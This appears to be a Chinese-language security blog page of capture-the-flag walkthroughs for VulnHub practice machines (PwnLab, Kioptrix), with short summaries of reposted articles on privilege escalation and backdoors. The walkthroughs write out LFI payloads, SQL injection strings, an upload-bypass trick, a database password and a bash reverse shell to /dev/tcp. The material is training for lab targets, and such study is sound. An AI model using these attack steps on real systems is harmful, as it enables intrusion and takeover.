歡迎光臨
我們一直在努力

Vulnhub x PwnLab: init

波波閱讀(1310)

VulnHub是一個面向所有人開放的安全靶場,裡面有很多安全環境,只要下載相關映像檔,在相關虛擬機器上面執行就可以練習相關靶場了。裡面設計了好多關,如果有耐心一定可以到達峰頂。許多考OSCP人員,也會利用Vulnhub靶場進行刷題。我們下載了一個經典漏洞靶場,給大家進行演示,希望讓初學者知道滲透測試的套路,可以更快的成長。

該題從首頁網址判斷存在個Local File Inclusion,並可直接查看該網站Source Code,且該主機對外開放3306 Port,於是讀取Config.php檔案取得資料庫訊息後,嘗試登入MySQL並查看該會員密碼,接著繞過Upload上傳檔案並繞過白名單,上傳Reverse Shell,伺服器內的程式存在Command Injection,經一番努力下,最後成功讀取到根目錄下的flag。

靶機:PwnLab: init

首先,先查詢自己本地的IP,可以透過 ifconfig查詢。

eth0 192.168.43.119 這是本地IP ,同時也是攻擊者端

透過nmap -sP ,使用Ping方式快速掃描該內網網段主機,並找到該標的為192.168.43.112

接著透過 nmap -A 完整掃描該標的主機,並透過 -p 0-65535 掃描該主機的端口

結果為開啟了 80 port、111 port、3306 port (MySQL)、42185 port

讓我們訪問網站

http://192.168.43.112/

http://192.168.43.112/?page=login

從網址直覺的可以判斷這似乎存在LFI漏洞,只要簡單測試下就知道了

http://192.168.43.112/?page=php://filter/convert.base64-encode/resource=index

透過LFI解析出來的是base64編碼,所以我們需要再將其內容decode回去,才會還原真實內容

接著我們繼續將所有頁面透過LFI來讀取source code

http://192.168.43.112/?page=php://filter/convert.base64-encode/resource=login

看到一個令人感興趣的內容,config.php,這裡面一定存在著秘密

http://192.168.43.112/?page=php://filter/convert.base64-encode/resource=config

Boom!MySQL的帳號密碼出來了!還記得前面我們透過nmap掃描到3306端口嗎?

記錄下來,我們在之後可以用到。

http://192.168.43.112/?page=php://filter/convert.base64-encode/resource=upload

這邊的upload上傳檔案限制了一些,從Code裡邊可以看到白名單,jpg、jpeg、gif、png

在第31行是針對這個檔案MIME是否為image/xxx

由於上傳檔案需要先登入才能上傳,但沒有帳號,於是我們嘗試登入到MySQL查看下,

#mysql -h 192.168.43.112 -uroot -p H4u%QJ_H99

從users表可以看到有三組帳號密碼,而密碼透過base64編碼過,於是簡單decode就成。

將資料庫的帳號密碼整理下。

登入該網站,登入後並寫一個Reverse Shell反彈

需要注意的是,因為上傳有被白名單限制,所以將php副檔名更改為gif或png等

然後偽造成圖片,可以在php前面加個GIF89;

接著使用Kali 監聽 4444端口,當我們上傳Reverse Shell後,檔案名稱為 md5

而在前面,我們透過LFI查看index.php,Source code有段

<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
include("lang/".$_COOKIE['lang']);
}

於是我們透過Burp 將Cookie 改成 lang:../upload/圖片.gif

送出後,即可成功監聽到shell

成功取得shell,透過whoami查看下,用戶是www-data

接著可以查看下幾個目錄,如/home /var /etc /usr /tmp等,查找下看有沒有可以提權的資訊。

並嘗試將資料庫所取得的用戶也登入查看下 kent、mike、kane

我們在/home目錄下看到有四個目錄,分別是 john kane kent mike

可惜因權限關係,無法查看其他用戶的目錄,而在kent用戶下也沒啥資訊,於是我們轉戰到kane查看

在kane用戶下的kane目錄裡邊發現到一個檔案,msgmike,於是我們直接執行看看

無法直接執行,因配置關係,所以我們要設定一下PATH

touch cat

echo /bin/sh > cat

chmod +x cat

export PATH=/tmp:$PATH

接下來執行msgmike,經嘗試一番後發現是個可以下Command Injection的程式,且權限是mike

這就有趣了,於是我們可以透過該程式讓我們訪問mike目錄

我們先進入交互式操作,方便我們下指令

python -c 'import pty; pty.spawn("/bin/bash")'

在mike目錄下,發現到msg2root,

當然這也是個可以Command Injection的程式,且權限是root,那就更好辦了,我們可以透過該程式讓我們查找根目錄下的flag。

透過該Command Injection 直接

;ls /root

;cat /root/flag.txt 後發現沒反應,判斷可能是cat壞掉了

正當思考怎麼辦時,發現可以直接透過vi來編輯讀取該flag ..XD

結束。

 

Windows本地提權工具Juicy Potato測試分析

波波閱讀(1178)

原文地址:http://www.4hou.com/technology/13698.html

Juicy Potato是一款Windows系統的本地提權工具,是在工具RottenPotatoNG的基礎上做了擴充套件,適用條件更廣。

利用的前提是獲得了SeImpersonate或者SeAssignPrimaryToken許可權,通常在webshell下使用。

那麼,Juicy Potato的使用方法有哪些,有哪些限制條件呢?本文將對其進行測試,根據原理分析限制條件。

Juicy Potato的下載地址:

https://github.com/ohpe/juicy-potato

前言引用來源:http://www.4hou.com/technology/13698.html
文章圖片來源:http://www.4hou.com/technology/13698.html

-------------------
如果你認同我們每日分享的文章,請幫我們按個讚並且點擊追蹤「搶先看」,讓我們提供最新消息給您!您的分享及點讚,是我們持續推廣資訊安全最大的動力來源。
https://www.facebook.com/LonelyPoPo/

Metasploit生成windows後門並控制區域網主機

波波閱讀(874)

原文地址:https://blog.csdn.net/qq_36328915/article/details/79304977

紀錄一下,用Metasploit生成Windows backdoor,產生exe,Reverse shell回Kali上進行操作

前言引用來源:https://blog.csdn.net/qq_36328915/article/details/79304977
文章圖片來源:https://blog.csdn.net/qq_36328915/article/details/79304977

-------------------
如果你認同我們每日分享的文章,請幫我們按個讚並且點擊追蹤「搶先看」,讓我們提供最新消息給您!您的分享及點讚,是我們持續推廣資訊安全最大的動力來源。
https://www.facebook.com/LonelyPoPo/

成功獲取WinRAR 19年歷史程式碼執行漏洞

波波閱讀(1083)

原文地址:https://www.anquanke.com/post/id/171403

在本文中,我們講述瞭如何使用WinAFL模糊測試工具找到WinRAR中的邏輯錯誤,並利用它來完全控制失陷主機的故事。該漏洞僅通過提取精心構造的存檔檔案即可成功利用,使超過5億使用者的主機面臨風險。這個漏洞存在已達19年之久!並迫使WinRAR完全放棄對易受攻擊格式的支援。

前言引用來源:https://www.anquanke.com/post/id/171403
文章圖片來源:https://www.anquanke.com/post/id/171403

-------------------
如果你認同我們每日分享的文章,請幫我們按個讚並且點擊追蹤「搶先看」,讓我們提供最新消息給您!您的分享及點讚,是我們持續推廣資訊安全最大的動力來源。
https://www.facebook.com/LonelyPoPo/

Micro8後滲透學習紀錄-系列

波波閱讀(975)

原文地址:https://github.com/Micropoor/Micro8

連載其中包括穿插在工作中的項目心得筆記,包括但不限制於程式碼審計,web滲透,內網滲透,域滲透,隧道介紹,日誌溯源與暴力溯源等。滲透測試/APT模擬攻擊,是一把雙刃劍,Micro8系列適用於初中級安全從業人員,乙方安全測試,甲方安全自檢,網路安全愛好者等,企業安全防護與提高,該系列遵守:免費,自由,共享,開源。請勿觸犯法律,如觸犯與本作者無關。當下載/傳播/學習等便視為同意該條例。願讀者學有所成,問有所得,靜有所思,而私有所惘。

前言引用來源:https://github.com/Micropoor/Micro8
文章圖片來源:https://github.com/Micropoor/Micro8

-------------------
如果你認同我們每日分享的文章,請幫我們按個讚並且點擊追蹤「搶先看」,讓我們提供最新消息給您!您的分享及點讚,是我們持續推廣資訊安全最大的動力來源。
https://www.facebook.com/LonelyPoPo/

Linux常見backdoor及排查技術

波波閱讀(936)

原文地址:https://xz.aliyun.com/t/4090

在伺服器被入侵後進行應急響應無非通過檔案排查、網路排查、程序排查、系統資訊排查等方法進行入侵排查。下面就一些常見技巧以及公開的工具進行剖析介紹

前言引用來源:https://xz.aliyun.com/t/4090
文章圖片來源:https://xz.aliyun.com/t/4090

-------------------
如果你認同我們每日分享的文章,請幫我們按個讚並且點擊追蹤「搶先看」,讓我們提供最新消息給您!您的分享及點讚,是我們持續推廣資訊安全最大的動力來源。
https://www.facebook.com/LonelyPoPo/

Vulnhub x Kioptrix: Level 1.3 (#4)

波波閱讀(962)

VulnHub是一個面向所有人開放的安全靶場,裡面有很多安全環境,只要下載相關映像檔,在相關虛擬機器上面執行就可以練習相關靶場了。裡面設計了好多關,如果有耐心一定可以到達峰頂。許多考OSCP人員,也會利用Vulnhub靶場進行刷題。我們下載了一個經典漏洞靶場,給大家進行演示,希望讓初學者知道滲透測試的套路,可以更快的成長。

該題在首頁為一登入功能,透過簡易SQL Injection取得密碼後,嘗試登入ssh,在shell命令限制下,得跳脫限制來提權,接著查看該網站文件設定檔,取得資料庫訊息後,透過MySQL資料庫提權為root。

靶機:Kioptrix: Level 1.3 (#4)

首先,先查詢自己本地的IP,可以透過 ifconfig查詢。

eth0 192.168.43.119 這是本地IP ,同時也是攻擊者端

使用nmap -sP,用Ping方式快速掃描該網段的主機。

發現標的為 192.168.43.79

繼續使用nmap -A對該主機完整掃描,並掃描該端口 0-65535 port。

結果發現 開啟 22 port、80 port、139 port、445 port。

對該80 port的網頁端進行dirb目錄探測,

看到 /john的目錄。

訪問該網站 192.168.43.79/john ,會自動跳轉為 192.168.43.79/index.php,為一個登入頁面框。

於是嘗試弱密碼與SQL Injection注入

測試許多注入語法,最後 透過 ' or 1=1 # 成功注入

帳號 john

密碼 ' or 1=1 #

登入成功後,顯示john的密碼為 MyNameIsJohn

於是接著嘗試ssh登入,帳號john

登入後,有些指令被限制住了,但使用help可以查看可以下的指令。

這讓我想到這篇文章,我們可以透過echo來幫助我們跳脫限制

Escaping Restricted Linux Shells

echo python: exit_code = os.system('/bin/sh') output = os.popen('/bin/sh').read()

接著進入到 /root目錄後,發現有個 congrats.txt檔,

-rw-r--r-- 1 root root 625 2012-02-06 10:48 congrats.txt

我們可以直接查看該檔案。

但我們最終目的應該是要取得root帳號,所以還沒結束。

我們進入到/var/www/john目錄,並查看 john.php

顯示資料庫的資訊,帳號為root,密碼為空。

於是直接老方法,透過MySQL提權就行了。

mysql -uroot -p,成功登入後,將john的帳號添加權限。

select sys_exec('useradd -a -G admin john');

勝利就在眼前。添加完權限後,直接sudo su,即可提權成功為root。

結束。

Vulnhub x Kioptrix: Level 1.2 (#3)

波波閱讀(1176)

VulnHub是一個面向所有人開放的安全靶場,裡面有很多安全環境,只要下載相關映像檔,在相關虛擬機器上面執行就可以練習相關靶場了。裡面設計了好多關,如果有耐心一定可以到達峰頂。許多考OSCP人員,也會利用Vulnhub靶場進行刷題。我們下載了一個經典漏洞靶場,給大家進行演示,希望讓初學者知道滲透測試的套路,可以更快的成長。

該題Login介面使用LotusCMS,而剛好存在RCE漏洞,於是透過該漏洞取得shell後,查看網站config配置取得資料庫帳號密碼,接著透過xtern終端介面,修改/etc/sudoers來成功提權為root

靶機:Kioptrix: Level 1.2 (#3)

首先,先查詢自己本地的IP,可以透過 ifconfig查詢。

eth0 192.168.43.119 這是本地IP ,同時也是攻擊者端

使用nmap -sP,透過Ping方式快速查找該網段其他主機。

找到該標的端為 192.168.43.249

使用Nmap -A 完整掃描該標的端服務,並使用-p 0-65535 掃描全部端口

根據結果,開啟了 22 port、80 port。

很明顯的這是要從網頁端下手。

簡單看下首頁,共有三個功能,分別是 Home Blog Login。

 

 

 

 

 

 

 

 

 

 

 

查看Login,仔細可以發現這是一個LotusCMS,於是Google找到LotusCMS-Exploit,存在漏洞,可直接RCE利用。

執行RCE腳本,輸入Kali端IP 與 要監聽的 Port

接著再另外一視窗,nc 監聽 4444 port,便成功取得shell

我們訪問網站 gallery的config檔設定,可以看到資料庫的帳號密碼。

登入MySQL資料庫後,繼續蒐集資訊,查詢其他使用者。

於是看到 2個User,但密碼被hash過了。

可直接上John工具或丟線上hash解。

這邊將得到的hash解開,成功取得該使用者密碼。

於是將兩位使用者都ssh登入察看一番後,最後在loneferret用戶下,看到這一段文字。

要求使用 sudo ht。

於是我們下sudo ht後,顯示

Error opening terminal: xterm-256color.

經過一番Google查詢關於該訊息後,最後需要輸入

export TERM=xterm

接著就會進入到該xterm 256畫面,值得注意的是 該 xterm 是由root權限所執行,所以我們可以去 /etc/sudoers檔修改,添加 /bin/bash,讓我們接下來可以執行bash shell

保存離開。

執行sudo /bin/bash後,就成功提權為root了。

勝利就在眼前。

進入到/root目錄,查看該Congrats.txt,獲勝!

結束。

內網滲透TIPS

波波閱讀(1584)

原文地址:https://github.com/Ridter/Intranet_Penetration_Tips

內網滲透TIPS

前言引用來源:https://github.com/Ridter/Intranet_Penetration_Tips
文章圖片來源:https://github.com/Ridter/Intranet_Penetration_Tips

-------------------
如果你認同我們每日分享的文章,請幫我們按個讚並且點擊追蹤「搶先看」,讓我們提供最新消息給您!您的分享及點讚,是我們持續推廣資訊安全最大的動力來源。
https://www.facebook.com/LonelyPoPo/

Vulnhub x Kioptrix: Level 1.1 (#2)

波波閱讀(969)

VulnHub是一個面向所有人開放的安全靶場,裡面有很多安全環境,只要下載相關映像檔,在相關虛擬機器上面執行就可以練習相關靶場了。裡面設計了好多關,如果有耐心一定可以到達峰頂。許多考OSCP人員,也會利用Vulnhub靶場進行刷題。我們下載了一個經典漏洞靶場,給大家進行演示,希望讓初學者知道滲透測試的套路,可以更快的成長。

該題從網頁端進行SQL Injection成功登入後,接著透過Command Injection反彈shell,進入到主機後直接使用'sock_sendpage()' Ring0 Privilege Escalation進行提權至Root權限,成功取得flag。

靶機:Kioptrix: Level 1.1 (#2)

首先,先查詢自己本地的IP,可以透過 ifconfig查詢。

eth0 192.168.43.119 這是本地IP ,同時也是攻擊者端

使用nmap -sP,透過Ping方式來查詢該網段其他主機。

找到 192.168.43.171 標的端

透過nmap -A 完整掃描該主機服務,並透過 -p 0-65535掃描該主機 Port

可發現該主機開啟了 22 port、80 port、111 port、443 port、628 port、631 port、3306 port。

訪問該web頁面,發現是個登入框,這邊嘗試用SQL Injection

帳號 admin ' or '1'='1--+

密碼 123

便成功登入。

登入後,可以發現有個Web Console,第一直覺是可以下 Command Injection。這種類型在CTF很常見。

簡單測試下,指令下 ;id

成功顯示 uid為 apache

查看下當前路徑 ;pwd

於是我們直接下命令,反彈一個shell到我們的Kali主機上

;bash -i >&/dev/tcp/192.168.43.119/4444 0>&1

使用nc 監聽 4444 port,並成功取得shell。

使用 uname -a 查詢系統版本,發現可以使用該Linux Kernel 2.4/2.6 - 'sock_sendpage()' Ring0 Privilege Escalation 進行提權。

下載該exp後,直接gcc編譯下,然後賦予權限,後執行。

成功取得root權限

成功得到root後,接著查找root檔案,最後發現在/var/mail目錄下,於是直接cat root,便取得flag。

結束。

波波的寂寞世界

Facebook聯繫我們